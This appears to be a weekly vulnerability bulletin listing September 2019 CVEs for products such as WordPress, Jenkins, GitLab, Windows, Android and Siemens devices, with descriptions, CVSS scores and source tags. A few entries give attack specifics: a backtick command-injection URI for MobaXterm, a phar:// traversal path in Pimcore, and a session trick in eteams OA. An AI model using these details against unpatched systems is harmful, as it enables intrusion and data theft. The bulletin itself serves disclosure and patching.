MISCvsourz -- cf7_invisible_recaptcha The cf7-invisible-recaptcha plugin before 1.3.2 for WordPress has XSS. 2019-09-09 4.3 CVE-2018-21012
MISC
MISCweaver -- eteams_oa An issue was discovered in eteams OA v4.0.34. Because the session is not strictly checked, the account names and passwords of all employees in the company can be obtained by an ordinary account. Specifically, the attacker sends a jsessionid value for URIs under app/profile/summary/. 2019-09-08 4.0 CVE-2019-16133
MISCwordpress -- wordpress WordPress before 5.2.3 allows XSS in media uploads because wp_ajax_upload_attachment is mishandled. 2019-09-11 4.3 CVE-2019-16217
MISC
MISCwordpress -- wordpress WordPress before 5.2.3 allows XSS in stored comments. 2019-09-11 4.3 CVE-2019-16218
MISC
MISCwordpress -- wordpress WordPress before 5.2.3 allows XSS in shortcode previews. 2019-09-11 4.3 CVE-2019-16219
MISC
MISC
MISCwordpress -- wordpress In WordPress before 5.2.3, validation and sanitization of a URL in wp_validate_redirect in wp-includes/pluggable.php could lead to an open redirect. 2019-09-11 5.8 CVE-2019-16220
MISC
MISC
MISC
MISCwordpress -- wordpress WordPress before 5.2.3 allows reflected XSS in the dashboard. 2019-09-11 4.3 CVE-2019-16221
MISC
MISCwordpress -- wordpress WordPress before 5.2.3 has an issue with URL sanitization in wp_kses_bad_protocol_once in wp-includes/kses.php that can lead to cross-site scripting (XSS) attacks. 2019-09-11 4.3 CVE-2019-16222
MISC
MISC
MISC
MISCwp-kama -- kama_click_counter The kama-clic-counter plugin before 3.5.0 for WordPress has XSS. 2019-09-13 4.3 CVE-2017-18615
MISCwpcharitable -- charitable The charitable plugin before 1.5.14 for WordPress has unauthorized access to user and donation details. 2019-09-09 5.0 CVE-2018-21011
MISC
MISCxtremelocator -- xtremelocator The xtremelocator plugin 1.5 for WordPress has SQL injection via the id parameter. 2019-09-13 6.5 CVE-2016-10939
MISC
MISCxwiki -- cryptpad The pad management logic in XWiki labs CryptPad before 3.0.0 allows a remote attacker (who has access to a Rich Text pad with editing rights for the URL) to corrupt it (i.e., cause data loss) via a trivial URL modification. 2019-09-11 5.5 CVE-2019-15302
MISC
CONFIRMzm-gallery_project -- zm-gallery The zm-gallery plugin 1.0 for WordPress has SQL injection via the order parameter. 2019-09-13 6.5 CVE-2016-10940
MISC
MISCzx-csv-upload_project -- zx-csv-upload The zx-csv-upload plugin 1 for WordPress has SQL injection via the id parameter. 2019-09-13 6.5 CVE-2016-10943
MISC
MISC
MISCLow Vulnerabilities
Back to topPrimary
Vendor -- ProductDescription Published CVSS Score Source & Patch Info atlassian -- jira Various templates of the Optimization plugin in Jira before version 7.13.6, and from version 8.0.0 before version 8.4.0 allow remote attackers who have permission to manage custom fields to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the name of a custom field. 2019-09-11 3.5 CVE-2019-8450
N/Abuddyboss -- buddymoss_media The buddyboss-media plugin through 3.2.3 for WordPress has stored XSS. 2019-09-09 3.5 CVE-2018-21014
MISCcybozu -- garoon DOM-based cross-site scripting vulnerability in Cybozu Garoon 4.6.0 to 4.10.2 allows remote authenticated attackers to inject arbitrary web script or HTML via unspecified vectors. 2019-09-12 3.5 CVE-2019-5975
MISC
MISCdell -- rsa_identity_governance_and_lifecycle The RSA Identity Governance and Lifecycle software and RSA Via Lifecycle and Governance products prior to 7.1.0 P08 contain a stored cross-site scripting vulnerability in the Access Request module. A remote authenticated malicious user could potentially exploit this vulnerability to store malicious HTML or JavaScript code in a trusted application data store. When victim users access the data store through their browsers, the stored malicious code would gets executed by the web browser in the context of the vulnerable web application. 2019-09-11 3.5 CVE-2019-3761
CONFIRMdell -- rsa_identity_governance_and_lifecycle The RSA Identity Governance and Lifecycle software and RSA Via Lifecycle and Governance products prior to 7.1.0 P08 contain an information exposure vulnerability. The Office 365 user password may get logged in a plain text format in the Office 365 connector debug log file. An authenticated malicious local user with access to the debug logs may obtain the exposed password to use in further attacks. 2019-09-11 2.1 CVE-2019-3763
CONFIRMesri -- arcgis_enterprise In ArcGIS Enterprise 10.6.1, a crafted IFRAME element can be used to trigger a Cross Frame Scripting (XFS) attack through the EDIT MY PROFILE feature. 2019-09-11 3.5 CVE-2019-16193
MISCgetgophish -- gophish Gophish through 0.8.0 allows XSS via a username. 2019-09-09 3.5 CVE-2019-16146
MISCgitlab -- gitlab An issue was discovered in GitLab Community and Enterprise Edition before 11.8.9, 11.9.x before 11.9.10, and 11.10.x before 11.10.2. It has a Race Condition which could allow users to approve a merge request multiple times and potentially reach the approval count required to merge. 2019-09-09 3.5 CVE-2019-11546
CONFIRM
CONFIRMgitlab -- gitlab An issue was discovered in GitLab Community and Enterprise Edition before 11.8.9. It has Incorrect Access Control. Unprivileged members of a project are able to post comments on confidential issues through an authorization issue in the note endpoint. 2019-09-09 3.5 CVE-2019-11548
CONFIRM
CONFIRMgoogle -- android In the Android kernel in the f2fs driver there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. 2019-09-06 2.1 CVE-2019-9245
MISCgoogle -- android In the Android kernel in sync debug fs driver there is a kernel pointer leak due to the usage of printf with %p. This could lead to local information disclosure with system execution privileges needed. User interaction is not needed for exploitation. 2019-09-06 2.1 CVE-2019-9444
MISCgoogle -- android In the Android kernel in F2FS driver there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with system execution privileges needed. User interaction is not needed for exploitation. 2019-09-06 2.1 CVE-2019-9445
MISCgoogle -- android In the Android kernel in FingerTipS touchscreen driver there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with system execution privileges needed. User interaction is not needed for exploitation. 2019-09-06 2.1 CVE-2019-9449
MISCgoogle -- android In the Android kernel in SEC_TS touch driver there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. 2019-09-06 2.1 CVE-2019-9452
MISCgoogle -- android In the Android kernel in F2FS touch driver there is a possible out of bounds read due to improper input validation. This could lead to local information disclosure with system execution privileges needed. User interaction is not needed for exploitation. 2019-09-06 2.1 CVE-2019-9453
MISCgoogle -- android In the Android kernel in the video driver there is a kernel pointer leak due to a WARN_ON statement. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. 2019-09-06 2.1 CVE-2019-9455
MISCibps_online_exam_project -- ibps_online_exam The examapp plugin 1.0 for WordPress has XSS via exam input text fields. 2019-09-10 3.5 CVE-2017-18601
EXPLOIT-DBjenkins -- beaker_builder Jenkins Beaker Builder Plugin 1.9 and earlier stored credentials unencrypted in its global configuration file on the Jenkins master where they could be viewed by users with access to the master file system. 2019-09-12 2.1 CVE-2019-10398
MLIST
MISClimesurvey -- limesurvey LimeSurvey before v3.17.14 allows stored XSS for escalating privileges from a low-privileged account to, for example, SuperAdmin. The attack uses a survey group in which the title contains JavaScript that is mishandled upon group deletion. 2019-09-09 3.5 CVE-2019-16172
MISC
FULLDISC
MISC
BUGTRAQ
MISClimesurvey -- limesurvey LimeSurvey before v3.17.14 allows reflected XSS for escalating privileges from a low-privileged account to, for example, SuperAdmin. This occurs in application/core/Survey_Common_Action.php, 2019-09-09 3.5 CVE-2019-16173
MISC
FULLDISC
MISC
BUGTRAQ
MISClimesurvey -- limesurvey A stored cross-site scripting (XSS) vulnerability was found in Limesurvey before 3.17.14 that allows authenticated users with correct permissions to inject arbitrary web script or HTML via titles of admin box buttons on the home page. 2019-09-09 3.5 CVE-2019-16178
MISC
MISCmicrosoft -- .net_framework An elevation of privilege vulnerability exists when the .NET Framework common language runtime (CLR) allows file creation in arbitrary locations, aka '.NET Framework Elevation of Privilege Vulnerability'. 2019-09-11 2.1 CVE-2019-1142
MISCmicrosoft -- sharepoint_foundation A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft Office SharePoint XSS Vulnerability'. 2019-09-11 3.5 CVE-2019-1262
MISCmicrosoft -- team_foundation_server A Cross-site Scripting (XSS) vulnerability exists when Team Foundation Server does not properly sanitize user provided input, aka 'Team Foundation Server Cross-site Scripting Vulnerability'. 2019-09-11 3.5 CVE-2019-1305
MISCmicrosoft -- windows_10 An information disclosure vulnerability exists when DirectX improperly handles objects in memory, aka 'DirectX Information Disclosure Vulnerability'. 2019-09-11 2.1 CVE-2019-1216
MISCmicrosoft -- windows_10 An information disclosure vulnerability exists when the Windows Transaction Manager improperly handles objects in memory, aka 'Windows Transaction Manager Information Disclosure Vulnerability'. 2019-09-11 2.1 CVE-2019-1219
MISCmicrosoft -- windows_10 An information disclosure vulnerability exists when DirectWrite improperly discloses the contents of its memory, aka 'DirectWrite Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2019-1244, CVE-2019-1245. 2019-09-11 2.1 CVE-2019-1251
MISCmicrosoft -- windows_10 An information disclosure vulnerability exists when Windows Hyper-V writes uninitialized memory to disk, aka 'Windows Hyper-V Information Disclosure Vulnerability'. 2019-09-11 2.1 CVE-2019-1254
MISCmicrosoft -- windows_10 An elevation of privilege vulnerability exists in Windows store installer where WindowsApps directory is vulnerable to symbolic link attack, aka 'Microsoft Windows Store Installer Elevation of Privilege Vulnerability'. 2019-09-11 3.6 CVE-2019-1270
MISCmicrosoft -- windows_10 A cross-site-scripting (XSS) vulnerability exists when Active Directory Federation Services (ADFS) does not properly sanitize certain error messages, aka 'Active Directory Federation Services XSS Vulnerability'. 2019-09-11 3.5 CVE-2019-1273
MISCmicrosoft -- windows_10 An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address, aka 'Windows Kernel Information Disclosure Vulnerability'. 2019-09-11 2.1 CVE-2019-1274
MISCmicrosoft -- windows_10 An information disclosure exists in the Windows Common Log File System (CLFS) driver when it fails to properly handle sandbox checks, aka 'Windows Common Log File System Driver Information Disclosure Vulnerability'. 2019-09-11 2.1 CVE-2019-1282
MISCmicrosoft -- windows_10 An elevation of privilege vulnerability exists when the Windows Update Delivery Optimization does not properly enforce file share permissions, aka 'Windows Update Delivery Optimization Elevation of Privilege Vulnerability'. 2019-09-11 3.6 CVE-2019-1289
MISCmicrosoft -- windows_10 An information disclosure vulnerability exists in Windows when the Windows SMB Client kernel-mode driver fails to properly handle objects in memory, aka 'Windows SMB Client Driver Information Disclosure Vulnerability'. 2019-09-11 2.1 CVE-2019-1293
MISCmicrosoft -- windows_10 A security feature bypass exists when Windows Secure Boot improperly restricts access to debugging functionality, aka 'Windows Secure Boot Security Feature Bypass Vulnerability'. 2019-09-11 2.1 CVE-2019-1294
MISCmicrosoft -- windows_7 An information disclosure vulnerability exists in the way that Microsoft Graphics Components handle objects in memory, aka 'Microsoft Graphics Components Information Disclosure Vulnerability'. 2019-09-11 2.1 CVE-2019-1283
MISCncrafts -- formcraft The formcraft3 plugin before 3.4 for WordPress has stored XSS via the "New Form > Heading > Heading Text" field. 2019-09-10 3.5 CVE-2017-18600
MISCopenssl -- openssl Normally in OpenSSL EC groups always have a co-factor present and this is used in side channel resistant code paths. However, in some cases, it is possible to construct a group using explicit parameters (instead of using a named curve). In those cases it is possible that such a group does not have the cofactor present. This can occur even where all the parameters match a known named curve. If such a curve is used then OpenSSL falls back to non-side channel resistant code paths which may result in full key recovery during an ECDSA signature operation. In order to be vulnerable an attacker would have to have the ability to time the creation of a large number of signatures where explicit parameters with no co-factor present are in use by an application using libcrypto. For the avoidance of doubt libssl is not vulnerable because explicit parameters are never used. Fixed in OpenSSL 1.1.1d (Affected 1.1.1-1.1.1c). Fixed in OpenSSL 1.1.0l (Affected 1.1.0-1.1.0k). Fixed in OpenSSL 1.0.2t (Affected 1.0.2-1.0.2s). 2019-09-10 1.9 CVE-2019-1547
MISC
MISC
CONFIRM
CONFIRM
CONFIRM
BUGTRAQ
CONFIRMsap -- business_one_client Under certain conditions SAP Business One client (B1_ON_HANA, SAP-M-BO), before versions 9.2 and 9.3, allows an attacker to access information which would otherwise be restricted. 2019-09-10 2.1 CVE-2019-0353
MISC
CONFIRMttlock -- ttlock TTLock devices do not properly block guest access in certain situations where the network connection to the cloud is unavailable. 2019-09-10 3.3 CVE-2019-12942
MISCttlock -- ttlock TTLock devices do not properly restrict password-reset attempts, leading to incorrect access control and disclosure of sensitive information about valid account names. 2019-09-10 2.6 CVE-2019-12943
MISCw1.fi -- hostapd hostapd before 2.10 and wpa_supplicant before 2.10 allow an incorrect indication of disconnection in certain situations because source address validation is mishandled. This is a denial of service that should have been prevented by PMF (aka management frame protection). The attacker must send a crafted 802.11 frame from a location that is within the 802.11 communications range. 2019-09-12 3.3 CVE-2019-16275
MLIST
MISC
MISC
MISCwebcraftic -- woody_ad_snippets The insert-php (aka Woody ad snippets) plugin before 2.2.8 for WordPress allows authenticated XSS via the winp_item parameter. 2019-09-13 3.5 CVE-2019-16289
MISC
MISC
MISCwordpress -- wordpress WordPress before 5.2.3 allows XSS in post previews by authenticated users. 2019-09-11 3.5 CVE-2019-16223
MISC
MISCSeverity Not Yet Assigned
Back to topPrimary
Vendor -- ProductDescription Published CVSS Score Source & Patch Info 3s_smart_software_solutions -- codesys_v3_web_server CODESYS V3 web server, all versions prior to 3.5.14.10, allows an attacker to send specially crafted http or https requests which may allow access to files outside the restricted working directory of the controller. 2019-09-13 not yet calculated CVE-2019-13532
MISC3s_smart_software_solutions -- codesys_v3_web_server CODESYS V3 web server, all versions prior to 3.5.14.10, allows an attacker to send specially crafted http or https requests which could cause a stack overflow and create a denial-of-service condition or allow remote code execution. 2019-09-13 not yet calculated CVE-2019-13548
MISCarubanetworks -- arubaos A command injection vulnerability is present in the web management interface of ArubaOS that permits an authenticated user to execute arbitrary commands on the underlying operating system. A malicious administrator could use this ability to install backdoors or change system configuration in a way that would not be logged. This vulnerability only affects ArubaOS 8.x. 2019-09-13 not yet calculated CVE-2019-5315
CONFIRMarubanetworks -- arubaos A remote code execution vulnerability is present in network-listening components in some versions of ArubaOS. An attacker with the ability to transmit specially-crafted IP traffic to a mobility controller could exploit this vulnerability and cause a process crash or to execute arbitrary code within the underlying operating system with full system privileges. Such an attack could lead to complete system compromise. The ability to transmit traffic to an IP interface on the mobility controller is required to carry out an attack. The attack leverages the PAPI protocol (UDP port 8211). If the mobility controller is only bridging L2 traffic to an uplink and does not have an IP address that is accessible to the attacker, it cannot be attacked. 2019-09-13 not yet calculated CVE-2018-7081
CONFIRM
MISCbosch -- access_professional_edition Unauthorized APE administration privileges can be achieved by reverse engineering one of the APE service tools. The service tool is discontinued with Bosch Access Professional Edition (APE) 3.8. 2019-09-12 not yet calculated CVE-2019-11898
CONFIRMdino -- dino Dino before 2019-09-10 does not properly check the source of a carbons message in module/xep/0280_message_carbons.vala. 2019-09-11 not yet calculated CVE-2019-16235
MLIST
MISC
MISCdino -- dino Dino before 2019-09-10 does not check roster push authorization in module/roster/module.vala. 2019-09-11 not yet calculated CVE-2019-16236
MLIST
MISC
MISCdino -- dino
Dino before 2019-09-10 does not properly check the source of an MAM message in module/xep/0313_message_archive_management.vala. 2019-09-11 not yet calculated CVE-2019-16237
MLIST
MISC
MISCec-cube -- amazon_pay_plugin Cross-site scripting vulnerability in EC-CUBE plugin 'Amazon Pay Plugin 2.12,2.13' version 2.4.2 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. 2019-09-12 not yet calculated CVE-2019-6003
MISC
MISCeclipse_foundation -- eclipse_omr Prior to 0.1, all builds of Eclipse OMR contain a bug where the loop versioner may fail to privatize a value that is pulled out of the loop by versioning - for example if there is a condition that is moved out of the loop that reads a field we may not privatize the value of that field in the modified copy of the loop allowing the test to see one value of the field and subsequently the loop to see a modified field value without retesting the condition moved out of the loop. This can lead to a variety of different issues but read out of array bounds is one major consequence of these problems. 2019-09-12 not yet calculated CVE-2019-11774
CONFIRMflamenet -- flamecms FlameCMS 3.3.5 has SQL injection in account/login.php via accountName. 2019-09-14 not yet calculated CVE-2019-16309
MISCfuji_xerox -- apeosware_management_suite_and_apeosware_management_suite_2 Open redirect vulnerability in ApeosWare Management Suite Ver.1.4.0.18 and earlier, and ApeosWare Management Suite 2 Ver.2.1.2.4 and earlier allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. 2019-09-12 not yet calculated CVE-2019-6004
MISC
MISCfuji_xerox -- docushare A Reflected Cross-Site Scripting (XSS) vulnerability in the webEx module in webExMeetingLogin.jsp and deleteWebExMeetingCheck.jsp in Fuji Xerox DocuShare through 7.0.0.C1.609 allows remote attackers to inject arbitrary web script or HTML via the handle parameter (webExMeetingLogin.jsp) and meetingKey parameter (deleteWebExMeetingCheck.jsp). 2019-09-14 not yet calculated CVE-2019-16307
MISCgitlab -- community_and_enterprise_edition An input validation and output encoding issue was discovered in the GitLab email notification feature which could result in a persistent XSS. This was addressed in GitLab 12.1.2, 12.0.4, and 11.11.6. 2019-09-09 not yet calculated CVE-2019-5471
MISC
CONFIRM
MISCgitlab -- community_and_enterprise_edition An input validation problem was discovered in the GitHub service integration which could result in an attacker being able to make arbitrary POST requests in a GitLab instance's internal network. This vulnerability was addressed in 12.1.2, 12.0.4, and 11.11.6. 2019-09-09 not yet calculated CVE-2019-5461
MISC
CONFIRM
MISCgitlab -- community_and_enterprise_edition An authorization issue was discovered in the GitLab CE/EE CI badge images endpoint which could result in disclosure of the build status. This vulnerability was addressed in 12.1.2, 12.0.4, and 11.11.6. 2019-09-09 not yet calculated CVE-2019-5463
CONFIRM
MISCgitlab -- community_and_enterprise_edition An input validation and output encoding issue was discovered in the GitLab CE/EE wiki pages feature which could result in a persistent XSS. This vulnerability was addressed in 12.1.2, 12.0.4, and 11.11.6. 2019-09-09 not yet calculated CVE-2019-5467
CONFIRM
MISCharbor -- harbor core/api/user.go in Harbor 1.7.0 through 1.8.2 allows non-admin users to create admin accounts via the POST /api/users API. This is fixed in 1.9.0-rc1. 2019-09-08 not yet calculated CVE-2019-16097
MISC
MISChikari_denwa -- router_operating_system
Cross-site scripting vulnerability in Hikari Denwa router/Home GateWay (Hikari Denwa router/Home GateWay provided by NIPPON TELEGRAPH AND TELEPHONE EAST CORPORATION PR-S300NE/RT-S300NE/RV-S340NE firmware version Ver. 19.41 and earlier, PR-S300HI/RT-S300HI/RV-S340HI firmware version Ver.19.01.0005 and earlier, PR-S300SE/RT-S300SE/RV-S340SE firmware version Ver.19.40 and earlier, PR-400NE/RT-400NE/RV-440NE firmware version Ver.7.42 and earlier, PR-400KI/RT-400KI/RV-440KI firmware version Ver.07.00.1010 and earlier, PR-400MI/RT-400MI/RV-440MI firmware version Ver. 07.00.1012 and earlier, PR-500KI/RT-500KI firmware version Ver.01.00.0090 and earlier, RS-500KI firmware version Ver.01.00.0070 and earlier, PR-500MI/RT-500MI firmware version Ver.01.01.0014 and earlier, and RS-500MI firmware version Ver.03.01.0019 and earlier, and Hikari Denwa router/Home GateWay provided by NIPPON TELEGRAPH AND TELEPHONE WEST CORPORATION PR-S300NE/RT-S300NE/RV-S340NE firmware version Ver. 19.41 and earlier, PR-S300HI/RT-S300HI/RV-S340HI firmware version Ver.19.01.0005 and earlier, PR-S300SE/RT-S300SE/RV-S340SE firmware version Ver.19.40 and earlier, PR-400NE/RT-400NE/RV-440NE firmware version Ver.7.42 and earlier, PR-400KI/RT-400KI/RV-440KI firmware version Ver.07.00.1010 and earlier, PR-400MI/RT-400MI/RV-440MI firmware version Ver. 07.00.1012 and earlier, PR-500KI/RT-500KI firmware version Ver.01.00.0090 and earlier, and PR-500MI/RT-500MI firmware version Ver.01.01.0011 and earlier) allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. 2019-09-12 not yet calculated CVE-2019-5985
MISC
CONFIRMifw8 -- router_rom ifw8 Router ROM v4.31 allows credential disclosure by reading the action/usermanager.htm HTML source code. 2019-09-14 not yet calculated CVE-2019-16313
MISCindexhibit -- indexhibit Indexhibit 2.1.5 allows a product reinstallation, with resultant remote code execution, via /ndxzstudio/install.php?p=2. 2019-09-14 not yet calculated CVE-2019-16314
MISCintegard -- integard_home_and_integard_pro_2 The web server in Integard Pro and Home before 2.0.0.9037 and 2.2.x before 2.2.0.9037 has a buffer overflow via a long password in an administration login POST request, leading to arbitrary code execution. 2019-09-13 not yet calculated CVE-2010-5333
MISC
MISC
MISCjenkins -- jenkins A sandbox bypass vulnerability in Jenkins Script Security Plugin 1.62 and earlier related to the handling of method names in method call expressions allowed attackers to execute arbitrary code in sandboxed scripts. 2019-09-12 not yet calculated CVE-2019-10393
MLIST
MISCjenkins -- jenkins Jenkins Build Environment Plugin 1.6 and earlier did not escape variables shown on its views, resulting in a cross-site scripting vulnerability in Jenkins 2.145, 2.138.1, or older, exploitable by users able to change various job/build properties. 2019-09-12 not yet calculated CVE-2019-10395
MLIST
MISCjenkins -- jenkins Jenkins Dashboard View Plugin 2.11 and earlier did not escape build descriptions, resulting in a cross-site scripting vulnerability exploitable by users able to change build descriptions. 2019-09-12 not yet calculated CVE-2019-10396
MLIST
MISCjenkins -- jenkins Jenkins Aqua Security Serverless Scanner Plugin 1.0.4 and earlier transmitted configured passwords in plain text as part of job configuration forms, potentially resulting in their exposure. 2019-09-12 not yet calculated CVE-2019-10397
MLIST
MISCjenkins -- jenkins A sandbox bypass vulnerability in Jenkins Script Security Plugin 1.62 and earlier related to the handling of property names in property expressions on the left-hand side of assignment expressions allowed attackers to execute arbitrary code in sandboxed scripts. 2019-09-12 not yet calculated CVE-2019-10394
MLIST
MISCjenkins -- jenkins Jenkins Git Client Plugin 2.8.4 and earlier did not properly restrict values passed as URL argument to an invocation of 'git ls-remote', resulting in OS command injection. 2019-09-12 not yet calculated CVE-2019-10392
MLIST
MISCjhipster -- jhipster_and_jhipster_kotlin A class generated by the Generator in JHipster before 6.3.0 and JHipster Kotlin through 1.1.0 produces code that uses an insecure source of randomness (apache.commons.lang3 RandomStringUtils). This allows an attacker (if able to obtain their own password reset URL) to compute the value for all other password resets for other accounts, thus allowing privilege escalation or account takeover. 2019-09-13 not yet calculated CVE-2019-16303
MISC
MISC
MISC
MISC
MISCkddi_corporation -- smart_tv_box Smart TV Box firmware version prior to 1300 allows remote attackers to bypass access restriction to conduct arbitrary operations on the device without user's intent, such as installing arbitrary software or changing the device settings via Android Debug Bridge port 5555/TCP. 2019-09-12 not yet calculated CVE-2019-6005
MISClibra -- libra Libra Core before 2019-09-03 has an erroneous regular expression for inline comments, which makes it easier for attackers to interfere with code auditing by using a nonstandard line-break character for a comment. For example, a Move module author can enter the // sequence (which introduces a single-line comment), followed by very brief comment text, the \r character, and code that has security-critical functionality. In many popular environments, this code is displayed on a separate line, and thus a reader may infer that the code is executed. However, the code is NOT executed, because language/compiler/ir_to_bytecode/src/parser.rs allows the comment to continue after the \r character. 2019-09-11 not yet calculated CVE-2019-16214
MISC
MISC
MISCline_corporation -- apng-drawable Integer overflow vulnerability in apng-drawable 1.0.0 to 1.6.0 allows an attacker to cause a denial of service (DoS) condition or execute arbitrary code via unspecified vectors. 2019-09-12 not yet calculated CVE-2019-6007
MISClinux -- linux_kernel In the Linux kernel through 5.2.14 on the powerpc platform, a local user can read vector registers of other users' processes via an interrupt. To exploit the venerability, a local user starts a transaction (via the hardware transactional memory instruction tbegin) and then accesses vector registers. At some point, the vector registers will be corrupted with the values from a different local Linux process, because MSR_TM_ACTIVE is misused in arch/powerpc/kernel/process.c. 2019-09-13 not yet calculated CVE-2019-15031
MISC
MISClinux -- linux_kernel In the Linux kernel through 5.2.14 on the powerpc platform, a local user can read vector registers of other users' processes via a Facility Unavailable exception. To exploit the venerability, a local user starts a transaction (via the hardware transactional memory instruction tbegin) and then accesses vector registers. At some point, the vector registers will be corrupted with the values from a different local Linux process because of a missing arch/powerpc/kernel/process.c check. 2019-09-13 not yet calculated CVE-2019-15030
MISC
MISCmcafee -- total_protection_free_antivirus_trial DLL Search Order Hijacking vulnerability in Microsoft Windows client in McAfee Total Protection (MTP) Free Antivirus Trial 16.0.R18 and earlier allows local users to execute arbitrary code via execution from a compromised folder placed by an attacker with administrator rights. 2019-09-13 not yet calculated CVE-2019-3646
CONFIRMmobatech -- mobaxterm In MobaXterm 11.1 and 12.1, the protocol handler is vulnerable to command injection. A crafted link can trigger a popup asking whether the user wants to run MobaXterm to handle the link. If accepted, another popup appears asking for further confirmation. If this is also accepted, command execution is achieved, as demonstrated by the MobaXterm://`calc` URI. 2019-09-14 not yet calculated CVE-2019-16305
MISCmotorola -- motorola_devices Some Motorola devices include the SIMalliance Toolbox Browser (aka S@T Browser) on the UICC, which might allow remote attackers to retrieve location and IMEI information, or retrieve other data or execute certain commands, via SIM Toolkit (STK) instructions in an SMS message, aka Simjacker. 2019-09-12 not yet calculated CVE-2019-16257
MISCniushop -- niushop NIUSHOP V1.11 has CSRF via search_info to index.php. 2019-09-14 not yet calculated CVE-2019-16311
MISCniushop -- niushop NIUSHOP V1.11 has XSS via the index.php?s=/admin URI. 2019-09-14 not yet calculated CVE-2019-16310
MISCnotepad++ -- notepad++ SciLexer.dll in Scintilla in Notepad++ (x64) before 7.7 allows remote code execution or denial of service via Unicode characters in a crafted .ml file. 2019-09-14 not yet calculated CVE-2019-16294
MISC
MISC
MISCnxp_semiconductors -- kinetis_kv1x_and_kinetis_kv3x_and_kinetis_k8x_devices On NXP Kinetis KV1x, Kinetis KV3x, and Kinetis K8x devices, Flash Access Controls (FAC) (a software IP protection method for execute-only access) can be defeated by observing CPU registers and the effect of code/instruction execution. 2019-09-12 not yet calculated CVE-2019-14237
MISCphilips -- intellivue_m3002a_x2_mms_transport_monitor/module_and_ intellivue_mp_monitors Philips IntelliVue WLAN, portable patient monitors, WLAN Version A, Firmware A.03.09, WLAN Version A, Firmware A.03.09, Part #: M8096-67501, WLAN Version B, Firmware A.01.09, Part #: N/A (Replaced by Version C) and WLAN Version B, Firmware A.01.09, Part #: N/A (Replaced by Version C). An attacker can use these credentials to login via ftp and upload a malicious firmware. 2019-09-12 not yet calculated CVE-2019-13530
MISCphilips -- intellivue_m3002a_x2_mms_transport_monitor/module_and_ intellivue_mp_monitors Philips IntelliVue WLAN, portable patient monitors, WLAN Version A, Firmware A.03.09, WLAN Version A, Firmware A.03.09, Part #: M8096-67501, WLAN Version B, Firmware A.01.09, Part #: N/A (Replaced by Version C) and WLAN Version B, Firmware A.01.09, Part #: N/A (Replaced by Version C). The product downloads source code or an executable from a remote location and executes the code without sufficiently verifying the origin and integrity of the code. 2019-09-12 not yet calculated CVE-2019-13534
MISCpimcore -- pimcore In Pimcore before 5.7.1, an attacker with limited privileges can bypass file-extension restrictions via a 256-character filename, as demonstrated by the failure of automatic renaming of .php to .php.txt for long filenames, a different vulnerability than CVE-2019-10867 and CVE-2019-16317. 2019-09-14 not yet calculated CVE-2019-16318
MISC
MISCpimcore -- pimcore In Pimcore before 5.7.1, an attacker with limited privileges can trigger execution of a .phar file via a phar:// URL in a filename parameter, because PHAR uploads are not blocked and are reachable within the phar://../../../../../../../../var/www/html/web/var/assets/ directory, a different vulnerability than CVE-2019-10867 and CVE-2019-16318. 2019-09-14 not yet calculated CVE-2019-16317
MISC
MISCs-cms -- s-cms s-cms V3.0 has XSS in index.php?type=text via the S_id parameter. 2019-09-14 not yet calculated CVE-2019-16312
MISCsamsung -- samsung_devices Some Samsung devices include the SIMalliance Toolbox Browser (aka S@T Browser) on the UICC, which might allow remote attackers to retrieve location and IMEI information, or retrieve other data or execute certain commands, via SIM Toolkit (STK) instructions in an SMS message, aka Simjacker. 2019-09-12 not yet calculated CVE-2019-16256
MISCsiemens -- ei/wsn-pa_link_wirelesshart_gateway A vulnerability has been identified in IE/WSN-PA Link WirelessHART Gateway (All versions). The integrated configuration web server of the affected device could allow Cross-Site Scripting (XSS) attacks if unsuspecting users are tricked into accessing a malicious link. User interaction is required for a successful exploitation. The user must be logged into the web interface in order for the exploitation to succeed. At the stage of publishing this security advisory no public exploitation is known. 2019-09-13 not yet calculated CVE-2019-13923
MISCsiemens -- simatic_tdc_cp51m1_module A vulnerability has been identified in SIMATIC TDC CP51M1 (All versions < V1.1.7). An attacker with network access to the device could cause a Denial-of-Service condition by sending a specially crafted UDP packet. The vulnerability affects the UDP communication of the device. The security vulnerability could be exploited without authentication. No user interaction is required to exploit this security vulnerability. Successful exploitation of the security vulnerability compromises availability of the targeted system. At the time of advisory publication no public exploitation of this security vulnerability was known. 2019-09-13 not yet calculated CVE-2019-10937
MISCsiemens -- sinema_remote_connect_server A vulnerability has been identified in SINEMA Remote Connect Server (All versions < V2.0 SP1). Some pages that should only be accessible by a privileged user can also be accessed by a non-privileged user. The security vulnerability could be exploited by an attacker with network access and valid credentials for the web interface. No user interaction is required. The vulnerability could allow an attacker to access information that he should not be able to read. The affected information does not include passwords. At the time of advisory publication no public exploitation of this security vulnerability was known. 2019-09-13 not yet calculated CVE-2019-13919
MISCsiemens -- sinema_remote_connect_server A vulnerability has been identified in SINEMA Remote Connect Server (All versions < V2.0 SP1). The web interface has no means to prevent password guessing attacks. The vulnerability could be exploited by an attacker with network access to the vulnerable software, requiring no privileges and no user interaction. The vulnerability could allow full access to the web interface. At the time of advisory publication no public exploitation of this security vulnerability was known. 2019-09-13 not yet calculated CVE-2019-13918
MISCsiemens -- sinema_remote_connect_server A vulnerability has been identified in SINEMA Remote Connect Server (All versions < V2.0 SP1). Some parts of the web application are not protected against Cross Site Request Forgery (CSRF) attacks. The security vulnerability could be exploited by an attacker that is able to trigger requests of a logged-in user to the application. The vulnerability could allow switching the connectivity state of a user or a device. At the time of advisory publication no public exploitation of this security vulnerability was known. 2019-09-13 not yet calculated CVE-2019-13920
